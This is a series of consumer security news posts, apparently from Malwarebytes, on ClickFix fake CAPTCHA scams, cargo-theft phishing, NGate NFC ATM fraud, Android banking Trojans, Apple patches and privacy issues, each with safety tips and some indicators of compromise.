IT News

Early on in 2025, I described how criminals used fake CAPTCHA sites and a clipboard hijacker to provide instructions for website visitors that would effectively infect their own machines with an information stealer known as the Lumma Stealer.

ClickFix is the name researchers have since given to this type of campaign—one that uses the clipboard and fake CAPTCHA sites to trick users into running malicious commands themselves.

Later, we found that the cybercriminals behind it seemed to be running some A/B tests to figure out which infection method worked best: ClickFix, or the more traditional file download that disguises malware as a useful application.

The criminals probably decided to go with ClickFix, because they soon came up with a campaign that targeted Mac users to spread the infamous Atomic Stealer.

Now, as reported by researchers from Push Security, the attackers behind ClickFix have tried to make the campaign more “user-friendly.”  The latest fake CAPTCHA pages include embedded video tutorials showing exactly how to run the malicious code.

The site automatically detects the visitor’s operating system and provides matching instructions, copying the right code for that OS straight to the clipboard—making typos less likely and infection more certain.

A countdown timer adds urgency, pressuring users to complete the “challenge” within a minute. When people rush instead of thinking things through, social engineering wins.

Unsurprisingly, most of these pages spread through SEO-poisoned Google search results, although they also circulate via email, social media, and in-app ads too.

How to stay safe

With ClickFix running rampant—and it doesn’t look like it’s going away anytime soon—it’s important to be aware, careful, and protected.

• Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
• Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
• Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
• Secure your devices. Use an up-to-date real-time anti-malware solution with a web protection component.
• Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

There’s a modern-day train heist happening across America, and this time, some of the bandana-masked robbers are sitting behind screens.

According to new research, a group of cybercriminals has been attacking trucking, freight, and logistics companies for months, impersonating brands and even diverting real cargo shipments to unapproved locations so that the stolen goods can be sold or shipped elsewhere.

The impact, the researchers said, extends far beyond the logistics industry:

“Such crimes can create massive disruptions to supply chains and cost companies millions, with criminals stealing everything from energy drinks to electronics. The most targeted commodities are food and beverage products.”

Although the cyberattacks were mostly seen in North America, cargo theft is a problem across the world, impacting consumers and businesses that rely on the often-overlooked network of trucks, trains, ships, planes, and people.

In these attacks, cybercriminals compromise the accounts of carrier companies that transport goods from one location to the next. By posing as legitimate carriers, they can place real bids on shipments and then redirect them to unauthorized destinations, where they or their partners will receive and steal the cargo.

Researchers found that attackers take control of these accounts in at least one of three ways.

1. Fake load boards

Attackers may post a fake order on what’s called a “load board,” a digital marketplace that connects shippers with carriers so that cargo can be assigned and accepted. But when legitimate carriers inquire about the fake load board posting, the criminals reply with an email that includes a malicious link that, when clicked, installs Remote Monitoring and Management (RMM) software. (To make the scam more convincing, the cybercriminals also compromise a “broker” account so their load board posting looks legitimate.)

Despite the sneaky install method, RMM software itself is entirely legitimate. It’s used by IT support teams to remotely fix issues for employees. But that legitimacy makes RMM software perfect for any cybercriminal campaign because it may raise fewer red flags from older antivirus tools.

Once the attackers gain access to a carrier’s account, they can also deploy malware to steal account credentials, giving them greater access to a company’s network.

2. Compromised email accounts

A second observed attack method involved hijacking an active email address and then impersonating the owner when responding to emails about cargo orders and shipments. Here, too, cybercriminals inserted malicious links into emails that eventually install RMM tools.

3. Social engineering

Finally, researchers also observed the attackers sending direct phishing emails to carriers, using classic social engineering tricks—like sending a bogus bill to lure victims into clicking malicious links.

While many of the well-tested security best practices still apply—like not clicking on links inside emails—one of the strongest defenses is to use a security product that notifies users about RMM tools (also sometimes referred to as Remote Desktop Programs) installed on their device. RMM tools are legitimate, but because of their abuses in cybercriminal campaigns, it is important that every installation is verified and tracked.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The Polish Computer Emergency Response Team (CERT Polska) analyzed a new Android-based malware that uses NFC technology to perform unauthorized ATM cash withdrawals and drain victims’ bank accounts.

Researchers found that the malware, called NGate, lets attackers withdraw cash from ATMs (Automated Teller Machines, or cash machines) using banking data exfiltrated from victims’ phones—without ever physically stealing the cards.

NFC is a wireless technology that allows devices such as smartphones, payment cards, and terminals to communicate when they’re very close together. So, instead of stealing your bank card, the attackers capture NFC (Near Field Communication) activity on a mobile phone infected with the NGate malware and forward that transaction data to devices at ATMs. In NGate’s case the stolen data is sent over the network to the attackers’ servers rather than being relayed purely by radio.

NFC comes in a few “flavors.” Some produce a static code—for example, the card that opens my apartment building door. That kind of signal can easily be copied to a device like my “Flipper Zero” so I can use that to open the door. But sophisticated contactless payment cards (like your Visa or Mastercard debit and credit cards) use dynamic codes. Each time you use the NFC, your card’s chip generates a unique, one-time code (often called a cryptogram or token) that cannot be reused and is different every time.

So, that’s what makes the NGate malware more sophisticated. It doesn’t simply grab a signal from your card. The phone must be infected, and the victim must be tricked into performing a tap-to-pay or card-verification action and entering their PIN. When that happens, the app captures all the necessary NFC transaction data exchanged — not just the card number, but the fresh one-time codes and other details generated in that moment.

The malware then instantly sends all that NFC data, including the PIN, to the attacker’s device. Because the codes are freshly generated and valid only for a short time, the attacker uses them immediately to imitate your card at an ATM; the accomplice at the ATM presents the captured data using a card-emulating device such as a phone, smartwatch, or custom hardware.

But, as you can imagine, being ready at an ATM when the data comes in takes planning—and social engineering.

First, attackers need to plant the malware on the victim’s device. Typically, they send phishing emails or SMS messages to potential victims. These often claim there is a security or technical issue with their bank account, trying to induce worry or urgency. Sometimes, they follow up with a phone call, pretending to be from the bank. These messages or calls direct victims to download a fake “banking” app from a non-official source, such as a direct link instead of Google Play.

Once installed, the app app asks for permissions and leads victims through fake “card verification” steps. The goal is to get victims to act quickly and trustingly—while an accomplice waits at an ATM to cash out.

How to stay safe

NGate only works if your phone is infected and you’re tricked into initiating a tap-to-pay action on the fake banking app and entering your PIN. So the best way to stay safe from this malware is keep your phone protected and stay vigilant to social engineering:

• Stick to trusted sources. Download apps only from Google Play, Apple’s App Store, or the official provider. Your bank will never ask you to use another source.
• Protect your devices. Use an up-to-date real-time anti-malware solution like Malwarebytes for Android, which already detects this malware.
• Do not engage with unsolicited callers. If someone claims to be from your bank, tell them you’ll call them back at the number you have on file.
• Ignore suspicious texts. Do not respond to or act upon unsolicited messages, no matter how harmless or urgent they seem.

Malwarebytes for Android detects these banking Trojans as Android/Trojan.Spy.NGate.C; Android/Trojan.Agent.SIB01022b454eH140; Android/Trojan.Agent.SIB01c84b1237H62; Android/Trojan.Spy.Generic.AUR9552b53bH2756 and Android/Trojan.Banker.AURf26adb59C19.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

It’s getting harder to keep your Windows space truly yours, as Microsoft increasingly serves annoying ads and tracks your data across third-party apps.

Pushing back against your eroding privacy has been a scattered and sometimes complicated process… but we’re making it easier for you. With the latest version of Malwarebytes for Windows, we’ve introduced Privacy Controls—a simple screen that brings several privacy settings together in one place, so you can easily decide how Microsoft handles your data.

With four simple toggles, you can decide whether to:

• Allow third-party apps to use your Advertising ID
• Allow third-party content on your lock screen
• Allow third-party content on your Start screen
• Allow Microsoft to use Windows diagnostic data

You can also disable all privacy-impacting features at once.

There’s more good news for your privacy. Malwarebytes now also alerts you when “Remote Desktop Programs” are installed on your device.

Remote Desktop Programs are powerful, often legitimate tools used by IT teams and tech support to fix problems remotely—especially since remote work became common. But the remote access these programs provide is powerful, which makes them a target for cybercriminals. If a real tech support account is compromised, a hacker could use the remote desktop program to tamper with your devices or spy on sensitive information.

There’s also a type of scam—called a tech support scam—where criminals trick people into installing remote desktop programs so they can take control of the victim’s device, potentially stealing data or money down the line.  

By flagging these programs, Malwarebytes gives you more visibility into what’s on your computer, so you can stay in control of your privacy and security.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Digital intruders have been targeting UK drinking water systems in what seems to be a growing risk.

Recorded Future News sent a request to the UK’s Drinking Water Inspectorate (DWI), the organization responsible for ensuring that drinking water is safe, for details on cyberattacks affecting the country’s water system. Using freedom of information laws, the site discovered five incidents that had taken place since January 1, 2024.

A steady stream of water attacks

These aren’t the first attacks on UK water systems. In August 2022, the Clop ransomware gang hit South Staffordshire Water, thinking that it was actually Thames Water. The attack focused on stealing customer data, meaning water supplies weren’t disrupted, although corporate systems were affected.

In late 2023, pro-Iranian hackers disrupted water supplies in County Mayo, Ireland. The intruders, known as the Cyber Av2ngers group, caused outages across 160 homes for two days. The attack was politically motivated by the utility’s apparent use of an Israeli-made tool.

These are far from the only attacks on water systems around the world. In February last year, CISA warned that a Chinese state-sponsored group had spent nine months moving laterally through a US water facility.

In that incident, attackers gained access using an administrator’s login and spent months inside the infrastructure, nosing around databases and other assets. CISA linked the intrusion to Volt Typhoon—a group that also targeted telecommunications companies around the world. The attackers were described as “OT adjacent,” meaning they had reached administrative systems close enough to potentially impact the operational technology that controls water flow.

The attacks keep coming. Just last month, the Canadian Centre for Cybersecurity reported an attack on a municipal water facility. Hacktivists managed to alter water pressure, causing “degraded service” for the local community.

It’s always worrying when attackers target critical national infrastructure. When attackers hit Colonial Pipeline in 2021, they only compromised its administrative network (the part that handles paperwork). But the company was spooked enough that it shut down its fuel distribution systems too, as a protective measure, causing gasoline prices to spike across the US East Coast.

A possible legal shake-up

Many attacks on water systems might go unreported, depending on where they happen. The UK’s Network and Information Systems (NIS) regulations dictate that critical national infrastructure organizations should reveal cyber attacks to the public. However, that only applies if those attacks caused disruption.

That’s why the attacks uncovered by Recorded Future haven’t been made public until now. While worrying, they didn’t affect the UK’s water supply. A 2022 review of the NIS regulations criticized this limited disclosure, noting that attacks with the potential to disrupt services often went unreported.

Although the attacks reported to Recorded Future were voluntarily disclosed by the DWI by suppliers, upcoming legal changes could lower the bar for mandatory reporting. The UK’s proposed Cyber Security and Resilience Bill would expand disclosure requirements, increasing transparency about attacks that could affect the water supply. The Bill is expected to reach Parliament in 2025—though time is running short.

A resource under pressure

Water is under considerable threat already in the UK, with major droughts declared this year. The Met Office reports that this year’s February-to-April period was the driest since 1956, with rainfall at just half the long-term average. River flows have dropped sharply, soil moisture is down, and the National Drought Group has met to coordinate a national response.

Water companies already have plans to manage shortages, the UK government says. But as the cyberattacks mount, the question is: are their system defenses strong enough too?

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google has rolled out a new autofill feature for Chrome that goes beyond storing just your passwords, addresses, and credit card numbers. The new “enhanced autofill” can now stash your driver’s license, passport details, VIN, or license plate information. Sounds convenient, right?

But just because you can, it doesn’t mean you should.

Let’s face it: filling out government forms or travel bookings online is a pain. Anything that saves a few minutes—or spares you from hunting down your passport at the back of a drawer—feels like a win, especially if Chrome can neatly autofill those fields. And yes, Google promises encryption, explicit permission for autofill, and manual activation only if you want it.

But let’s think this through. Is storing your most personally identifiable information—like government-issued IDs—in the market-dominant browser a good idea? Because that’s what Chrome is.

Chrome’s market share (over 73% at the time of writing) makes it the internet’s biggest bullseye for criminals. Whether you’re using the enhanced autofill or the regular one, browser-based storage schemes are relentlessly hunted by password stealers, infostealers, and other types of malware.

And let’s not forget phishing attempts. Maybe having to dig through your drawer while you think about why a website needs that information isn’t such a bad thing after all.

Sure, Chrome encrypts autofill data, only saves your info with permission, and asks for confirmation before pasting it into a form. You can also ramp up security with two-factor authentication (2FA) and a Chrome sync passphrase. But when cybercriminals get the right kind of access (by stealing a browser session, finding an unlocked device, or getting you to install a rogue extension), your sensitive information is in danger. And with what Chrome can now store, that could mean your identity.

Chrome’s enhanced autofill promises a smoother online ride, but the consequences of storing government IDs in your browser could outweigh the perks. Cybercriminals love a big target—and with Chrome’s popularity, the bounty only grows. When the reward for a criminal is your passport, driver’s license, or identity, convenience should come second to caution.

Thankfully, someone decided it was a good idea to turn off this feature by default, but if you want to check, here’s how to find it:

• Open Chrome.
• In the main Chrome menu, click on Settings.
• Under Autofill and passwords, select Enhanced autofill if present.

Better alternative: password managers

We would advise that if you must store this kind of information digitally, use a password manager. These tools are built for secure storage—they’re audited for security, separate from browser processes, and don’t automatically serve up your data to any site that happens to have the right input fields.

Stick to a dedicated password manager and stay in control of what’s stored and where it gets filled out. Remember: the less a browser knows about your life, the safer you are when someone eventually tries to break in.

Other recommendations:

• Make sure your browser is up to date.
• Use a real-time up-to-date anti-malware solution with web protection.
• Use two-factor authentication or passkeys to enhance the security of your important accounts.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Apple has released security updates for iPhones, iPads, Macs, Apple Watches, Apple TVs, Safari, and Xcode, fixing nearly 50 security flaws. Some of these bugs could let cybercriminals see your private data, take control of parts of your device, or break key security protections.

Installing these updates as soon as possible keeps your personal information—and everything else on your Apple devices—safe from attack.

What caught our eye

Although Apple never releases full details before everyone has had a chance to apply the updates, two serious security flaws stand out:

• CVE-2025-43442: This vulnerability is a permission issue which is fixed in iOS 26.1 and iPadOS 26.1. It could allow an app to identify which other apps a user has installed. You can imagine that if a banking Trojan—like this one on Android—can see which banking apps and crypto wallets someone uses they can maximize their social engineering strategies to target that user.
• CVE‑2025‑43455: This is a privacy issue in watchOS 26.1, visionOS 26.1, iOS 26.1, and iPadOS 26.1. It allows malicious apps to capture screenshots of sensitive information in embedded views. Apple addressed this by tightening privacy checks and isolation policies.

Updates for your particular device

This table shows which updates are available and points you to the relevant security content fot that operating system (OS).

How to update your devices

How to update your iPhone or iPad

For iOS and iPadOS users, here’s how to check if you’re using the latest software version:

• Go to Settings > General > Software Update.
• Turn on Automatic Updates if you haven’t already—you’ll find it on the same screen.

How to update macOS on any version

To update macOS on any supported Mac, use the Software Update feature, which Apple designed to work consistently across all recent versions. Here are the steps:

• Click the Apple menu in the upper-left corner of your screen.
• Choose System Settings (or System Preferences on older versions).
• Select General in the sidebar, then click Software Update on the right. On older macOS, just look for Software Update directly.
• Your Mac will check for updates automatically. If updates are available, click Update Now (or Upgrade Now for major new versions) and follow the on-screen instructions. Before you upgrade to macOS Tahoe 26, please read these instructions.
• Enter your administrator password if prompted, then let your Mac finish the update (it might need to restart during this process).
• Make sure your Mac stays plugged in and connected to the internet until the update is done.

How to update Apple Watch

Ensure your iPhone is paired with your Apple Watch and connected to Wi-Fi, then:

• Keep your Apple Watch on its charger and close to your iPhone.
• Open the Watch app on your iPhone.
• Tap General > Software Update.
• If an update appears, tap Download and Install.
• Enter your iPhone passcode or Apple ID password if prompted.

Your Apple Watch will automatically restart during the update process. Make sure it remains near your iPhone and on charge until the update completes.

How to update Apple TV

Turn on your Apple TV and make sure it’s connected to the internet, then:

• Open the Settings app on Apple TV.
• Navigate to System > Software Updates.
• Select Update Software.
• If an update appears, select Download and Install.

The Apple TV will download the update and restart as needed. Keep your device connected to power and Wi-Fi until the process finishes.

How to update your Safari browser

Safari updates are included with macOS updates, so installing the latest version of macOS will also update Safari. To check manually:

• Open the Apple menu > System Settings > General > Software Update.
• If you see a Safari update listed separately, click Update Now to install it.
• Restart your Mac when prompted.

If you’re on an older macOS version that’s still supported (like Sonoma or Sequoia), Apple may offer Safari updates independently through Software Update.

How to update Xcode

Xcode is Apple’s developer tool for building apps, so most people won’t have this, but if you do, you’ll need to keep it updated. Xcode updates come through the App Store:

• Open the App Store on your Mac.
• Click Updates in the sidebar.
• If an Xcode update is available, click Update next to it.
• You can also search for “Xcode” directly and click Update or Get if you’ve uninstalled it.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Researchers at Cyfirma have investigated Android Trojans capable of stealing sensitive data from compromised devices. The malware spreads by pretending to be trusted apps—like a news reader or even digital ID apps—tricking users into downloading it by accident.

In reality, it’s Android-targeting malware that preys on people who use banking and cryptocurrency apps. And a sneaky one. Once installed, it doesn’t announce itself in any way, but quietly works in the background to steal information such as login details and money.​

First, it checks if it’s running on a real phone or in a security test system so it can avoid detection. Then, it asks users for special permissions called “Accessibility Services,” claiming these help improve the app but actually giving the malware control over the device without the owner noticing. It also adds itself as a Device Administrator app.

With these permissions, the Trojan can read what’s on the screen, tap buttons, and fill in forms as if it were the user. It also overlays fake login screens on top of real banking and cryptocurrency apps, so when someone enters their username and password, the malware steals them.

Simply put, the Android overlay feature allows an app to appear on top of another app. Legitimate apps use overlays to show messages or alerts—like Android chat bubbles in Messenger—without leaving the current screen.

The Trojan connects to a remote command center, sending information about the phone, its location, and which banking apps are installed. At this point, attackers can send new instructions to the malware, like downloading updates to hide better or deleting traces of its activity. As soon as it runs, the Trojan also silences notifications and sounds so users don’t notice anything out of the ordinary.

The main risk is financial loss: once cybercriminals have banking credentials or cryptocurrency wallet codes, they can steal money or assets without warning. At this point in time the malware targets banking users in Southeast Asia, but its techniques could spread anywhere.

As we rely more on our phones for payments and important tasks, it’s clear that our mobile devices need the same level of protection that we expect on our laptops.

Malwarebytes for Android detects these banking Trojans as Android/Trojan.Spy.Banker.AUR9b9b491bC44.

How to stay safe

• Stick to trusted sources. Download apps—especially VPNs and streaming services—only from Google Play, Apple’s App Store, or the official provider. Never install something just because a link in a forum or message promises a shortcut.
• Check an app’s permissions. If an app asks for control over your device, your settings, Accessibility Services, or wants to install other apps, stop and ask yourself why. Does it really need those permissions to do what you expect it to do?
• Use layered, up-to-date protection. Install real-time anti-malware protection on your Android that scans for new downloads and suspicious activity. Keep both your security software and your device system updated—patches fix vulnerabilities that attackers can exploit.
• Stay informed. Follow trustworthy cybersecurity news and share important warnings with friends and family.

Indicators of compromise

File name: IdentitasKependudukanDigital.apk

SHA-256: cb25b1664a856f0c3e71a318f3e35eef8b331e047acaf8c53320439c3c23ef7c

File Name: identitaskependudukandigital.apk

SHA256:19456fbe07ae3d5dc4a493bac27921b02fc75eaa02009a27ab1c6f52d0627423

File Name: identitaskependudukandigital.apk

SHA-256: a4126a8863d4ff43f4178119336fa25c0c092d56c46c633dc73e7fc00b4d0a07

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Streaming service Sling TV has settled with the California Attorney General over allegations that it blocked users from exercising their privacy rights.

The company will pay $530,000 after being accused of making it difficult for customers to opt out of its data collection practices.

The California Consumer Privacy Act (CCPA) says consumers must be able to easily see how companies use their data and opt out if they choose. But according to a press release from the Attorney General’s office, Sling misled users who tried.

When users attempted to opt out of having their data shared, Sling redirected them to a page for changing cookie settings. Cookies are small files that help websites recognize users and track activity. However, changing the cookie controls on this page didn’t actually stop data sharing. To do that, users had to find and fill out a separate online form—even logged-in customers had to provide their name, address, email, and phone number, which Sling already had.

Users couldn’t opt out from connected devices either. Instead, they had to manually type a complex URL into a separate browser, the complaint said.

Children in the crosshairs

Sling also failed to protect children’s privacy. It didn’t age-screen users or offer kids’ profiles that avoided targeted advertising. The company even bought data from brokers to build detailed viewer profiles—including information about children in the home, the complaint alleged.

The complaint stated:

“Sling TV uses data about the presence of children in the household, and, in some cases, their age ranges, to build specific groups of viewers that can be targeted for cross-context behavioral advertising.”

The Sling case follows a string of privacy controversies in streaming. We recently wrote about how Roku faced similar accusations of selling children’s viewing data to advertisers and data brokers.

Falling subscriber numbers, rising revenue

Sling has been losing subscribers fast—down to 1.78 million—but it’s still making more money per viewer. How? By raising prices and leaning on targeted advertising, the very practice that just got it fined. Sling is a division of DISH Media, which says in its marketing material:

“DISH Media is helping brands and agencies reimagine their media mix to maximize return on ad spend… helping advertisers optimize reach, frequency, and return on investment through more strategic platform planning.”

What the settlement changes (and what it doesn’t)

Under the settlement, Sling TV must stop sending users who opt out to a cookie settings page, stop requiring logged-in users to fill out forms with data it already holds, and add a direct opt-out mechanism to its app. It must also let parents create kids’ profiles and explain how to protect children’s privacy.

This is Sling’s first major privacy violation, but DISH Network has faced scrutiny before. In 2020, it paid a $210 million penalty—the largest ever under the FTC’s Telemarketing Sales Rule—for making millions of unlawful telemarketing calls.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

The mobile AI gold rush has flooded app stores with lookalikes—shiny, convincing apps promising “AI image generation,” “smart chat,” or “instant productivity.” But behind the flashy logos lurks a spectrum of fake apps, from harmless copycats to outright spyware.

Spoofing trusted brands like OpenAI’s ChatGPT has become the latest tactic for opportunistic developers and cybercriminals to sell their “inventions” and spread malware.

A quick scan of app stores in 2025 shows an explosion of “AI” apps. As Appknox research reveals, these clones fall along a wide risk spectrum:

• Harmless wrappers: Some unofficial “wrappers” connect to legitimate AI APIs with basic add-ons like ads or themes. These mostly create privacy or confusion risks, rather than direct harm.
• Adware impersonators: Others abuse AI branding just to profit from ads. For example, a DALL·E image generator clone mimicking OpenAI’s look delivers nothing but aggressive ad traffic. Its only purpose: funneling user data to advertisers under the guise of intelligence. Package com.openai.dalle3umagic is detected by Malwarebytes as Adware.
• Malware disguised as AI tools: At the extreme, clones like WhatsApp Plus use spoofed certificates and obfuscated code to smuggle spyware onto devices. Once installed, these apps scrape contacts, intercept SMS messages (including one-time passwords), and quietly send everything to criminals via cloud services. WhatsApp Plus is an unofficial, third-party modified version of the real WhatsApp app, and some variants falsely claim to include AI-powered tools to lure users. Package com.wkwaplapphfm.messengerse is detected by Malwarebytes as Android/Trojan.Agent.SIB0185444803H262.

We’ve written before about cybercriminals hiding malware behind fake AI tools and installed packages that mimic popular services like Chat GPT, the lead monetization service Nova Leads, and an AI-empowered video tool called InVideo AI.

How to stay safe from the clones

As is true with all malware, the best defense is to prevent an attack before it happens. Follow these tips to stay safe:

• Download only from official stores. Stick to Google Play or the App Store. Don’t download apps from links in ads, messages, or social media posts.
• Check the developer name. Fake apps often use small tweaks—extra letters or punctuation—to look legitimate. If the name doesn’t exactly match, skip it.
• Read the reviews (but carefully). Real users often spot bad app behavior early. Look for repeated mentions of pop-ups, ads, or unexpected charges.
• Limit app permissions. Don’t grant access to contacts, messages, or files unless it’s essential for the app to work.
• Keep your device protected. Use trusted mobile security software that blocks malicious downloads and warns you before trouble starts.
• Delete suspicious apps fast. If something feels off—battery drain, pop-ups, weird network traffic—uninstall the app and run a scan.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.